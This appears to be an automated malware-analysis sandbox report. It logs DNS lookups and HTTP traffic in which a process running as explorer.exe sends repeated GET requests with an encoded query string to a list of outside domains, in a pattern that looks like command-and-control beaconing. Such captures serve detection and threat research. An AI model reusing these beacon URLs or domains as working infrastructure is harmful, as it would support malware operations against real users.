                                                                Jul 22, 2021 17:59:47.820266962 CEST192.168.2.48.8.8.80xd2f9Standard query (0)www.builtbydawn.comA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:53.020230055 CEST192.168.2.48.8.8.80xbf7Standard query (0)www.invisiongc.netA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Jul 22, 2021 17:58:53.591170073 CEST8.8.8.8192.168.2.40xa643No error (0)www.fitnesstwentytwenty.comfitnesstwentytwenty.comCNAME (Canonical name)IN (0x0001)
                                                                Jul 22, 2021 17:58:53.591170073 CEST8.8.8.8192.168.2.40xa643No error (0)fitnesstwentytwenty.com34.102.136.180A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:58:58.863302946 CEST8.8.8.8192.168.2.40x288fNo error (0)www.melodezu.commelodezu.comCNAME (Canonical name)IN (0x0001)
                                                                Jul 22, 2021 17:58:58.863302946 CEST8.8.8.8192.168.2.40x288fNo error (0)melodezu.com64.227.87.162A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:04.431778908 CEST8.8.8.8192.168.2.40xbfe0No error (0)www.sprinkleresources.comsprinkleresources.comCNAME (Canonical name)IN (0x0001)
                                                                Jul 22, 2021 17:59:04.431778908 CEST8.8.8.8192.168.2.40xbfe0No error (0)sprinkleresources.com78.47.57.7A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:09.999142885 CEST8.8.8.8192.168.2.40x7f21No error (0)www.professioneconsulenza.net89.46.109.25A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:15.193748951 CEST8.8.8.8192.168.2.40x14a9No error (0)www.iwccgroup.com104.21.86.209A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:15.193748951 CEST8.8.8.8192.168.2.40x14a9No error (0)www.iwccgroup.com172.67.136.222A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:21.100776911 CEST8.8.8.8192.168.2.40x4733Server failure (2)www.saludflv.infononenoneA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:26.208291054 CEST8.8.8.8192.168.2.40x8bdfNo error (0)www.manageoceanaccount.com104.21.40.211A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:26.208291054 CEST8.8.8.8192.168.2.40x8bdfNo error (0)www.manageoceanaccount.com172.67.188.96A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:31.431299925 CEST8.8.8.8192.168.2.40xf3f8Name error (3)www.cwdelrio.comnonenoneA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:36.513633013 CEST8.8.8.8192.168.2.40x1bf3Name error (3)www.mydreamtv.netnonenoneA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:42.140947104 CEST8.8.8.8192.168.2.40x7e22No error (0)www.jorgeporcayo.comjorgeporcayo.comCNAME (Canonical name)IN (0x0001)
                                                                Jul 22, 2021 17:59:42.140947104 CEST8.8.8.8192.168.2.40x7e22No error (0)jorgeporcayo.com162.241.62.54A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:47.895555019 CEST8.8.8.8192.168.2.40xd2f9No error (0)www.builtbydawn.com172.67.129.33A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:47.895555019 CEST8.8.8.8192.168.2.40xd2f9No error (0)www.builtbydawn.com104.21.2.115A (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:53.082292080 CEST8.8.8.8192.168.2.40xbf7No error (0)www.invisiongc.netinvisiongc.netCNAME (Canonical name)IN (0x0001)
                                                                Jul 22, 2021 17:59:53.082292080 CEST8.8.8.8192.168.2.40xbf7No error (0)invisiongc.net34.102.136.180A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.fitnesstwentytwenty.com
                                                                • www.melodezu.com
                                                                • www.sprinkleresources.com
                                                                • www.professioneconsulenza.net
                                                                • www.iwccgroup.com
                                                                • www.manageoceanaccount.com
                                                                • www.jorgeporcayo.com
                                                                • www.builtbydawn.com
                                                                • www.invisiongc.net

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.44976034.102.136.18080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 22, 2021 17:58:53.644109964 CEST8106OUTGET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.fitnesstwentytwenty.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:58:53.783077955 CEST8107INHTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Thu, 22 Jul 2021 15:58:53 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "60ef677e-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.44976164.227.87.16280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 22, 2021 17:58:59.060558081 CEST8108OUTGET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.melodezu.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:58:59.252990961 CEST8109INHTTP/1.1 404 Not Found
                                                                Date: Thu, 22 Jul 2021 15:58:59 GMT
                                                                Server: Apache/2.4.18 (Ubuntu)
                                                                Content-Length: 278
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.44976278.47.57.780C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 22, 2021 17:59:04.504060984 CEST8110OUTGET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.sprinkleresources.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:04.887867928 CEST8110INHTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 22 Jul 2021 15:59:04 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Location: http://sprinkleresources.com/dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw
                                                                Vary: Accept-Encoding
                                                                Content-Length: 0
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.44976389.46.109.2580C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 22, 2021 17:59:10.061862946 CEST8111OUTGET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.professioneconsulenza.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:10.122562885 CEST8112INHTTP/1.1 301 Moved Permanently
                                                                Server: aruba-proxy
                                                                Date: Thu, 22 Jul 2021 15:59:10 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 168
                                                                Connection: close
                                                                Location: https://www.professioneconsulenza.net/dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw
                                                                X-ServerName: ipvsproxy177.ad.aruba.it
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                4192.168.2.449764104.21.86.20980C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 22, 2021 17:59:15.237628937 CEST8113OUTGET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.iwccgroup.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:15.681235075 CEST8114INHTTP/1.1 404 Not Found
                                                                Date: Thu, 22 Jul 2021 15:59:15 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Last-Modified: Wed, 17 Mar 2021 11:02:44 GMT
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aYGn2VEN7wNFB%2BssKDmUplNRL10Cnzm6Ply0dK5FRfCgz5iFtoVNECzO9P%2FVSq3nQ78mZwjTNHso5RXhTIBLuQydQrnYDJQaxNDkUofb5UxvvUTbjFk9fUuiHEaG3iwZvc0OLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 672de0086c212c2a-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                Data Raw: 62 39 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 36 30 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 38 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 74 6f 70 7b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 34 30 25 20 2d 20 31 34 30 70 78 29 7d 2e 62 6f 74 74 6f 6d 7b 68 65 69 67 68 74 3a 31 35 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 36 30 25 20 2d 20 32 31 30 70 78 29 7d 2e 63 65 6e 74 65 72 7b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 7d 2e 63 69 72 63 6c 65 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 77 69 64 74 68 3a 32 36 30 70 78 3b 68 65 69 67 68 74 3a 32 36 30 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 30 63 36 63 63 7d 2e 63 69 72 63 6c 65 5f 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 63 6f 6c 6f 72 3a 23 35 30 35 61 36 34 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 5f 74 65 78 74 22 3e 34 30 34 3c
                                                                Data Ascii: b98<!DOCTYPE html><html><head><meta charset="utf-8"><style>html{height:100%}body{margin:0 auto;min-height:600px;min-width:800px;height:100%}.top{height:100px;height:calc(40% - 140px)}.bottom{height:150px;height:calc(60% - 210px)}.center{height:350px;text-align:center;vertical-align:middle;font-family:Verdana}.circle{margin:auto;width:260px;height:260px;border-radius:50%;background:#c0c6cc}.circle_text{line-height:260px;font-size:100px;color:#ffffff;font-weight:bold}.text{line-height:40px;font-size:26px;color:#505a64}</style></head><body><div class="top"></div><div class="center"><div class="circle"><div class="circle_text">404<


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                5192.168.2.449766104.21.40.21180C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 22, 2021 17:59:26.254539013 CEST8127OUTGET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.manageoceanaccount.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:26.328947067 CEST8128INHTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 22 Jul 2021 15:59:26 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                location: https://accountsredapple.com/dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JbKm5i2SCek9R7xmGZATyiecYj9toFFTWwAdJ2uHYmgn7v6rtQwrNmxvRFTprayFO0Y34EXqjPlZaUrfmcLd3JX0muKshErPWsD3Kh4oPFrZdRqY%2FKX6KJ1vQWzyUm0zcllUKvO5lYMFHwT%2FKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 672de04d4ac74db8-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                Data Raw: 62 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                Data Ascii: b9<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                6192.168.2.449768162.241.62.5480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 22, 2021 17:59:42.309887886 CEST8140OUTGET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.jorgeporcayo.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:43.077874899 CEST8141INHTTP/1.1 200 OK
                                                                Date: Thu, 22 Jul 2021 15:59:42 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                Retry-After: 86400
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Vary: Accept-Encoding
                                                                Accept-Ranges: none
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 6f 76 69 6d 69 65 6e 74 6f 20 70 65 72 73 6f 6e 61 6c 20 79 20 73 6f 63 69 61 6c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 55 6e 64 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 50 61 67 65 20 70 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74
                                                                Data Ascii: 91c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> is under construction</title> <meta name="description" content="Movimiento personal y social" /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.83" type="text/css"><link rel="stylesheet" href="htt


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                7192.168.2.449769172.67.129.3380C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 22, 2021 17:59:47.938975096 CEST8144OUTGET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.builtbydawn.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:48.012661934 CEST8145INHTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 22 Jul 2021 15:59:48 GMT
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Thu, 22 Jul 2021 16:59:47 GMT
                                                                Location: https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw
                                                                cf-request-id: 0b708ad90300004a683739f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AQaOuQBfkaMhbLJYTnjyTn%2B9V6LFXVSCCrJZFhJdSk1iIL0Ti%2FSzxRG7q%2BX8h03hw5r6JYtETdd%2FrLCVsXRDyGbFTsxD61nVk%2FFDnj0efn5Y45Zl%2FnKYd4pp7XLxmEr8HXM%2BSmLs"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Server: cloudflare
                                                                CF-RAY: 672de0d4dc534a68-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                8192.168.2.44977034.102.136.18080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 22, 2021 17:59:53.125844002 CEST8146OUTGET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.invisiongc.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
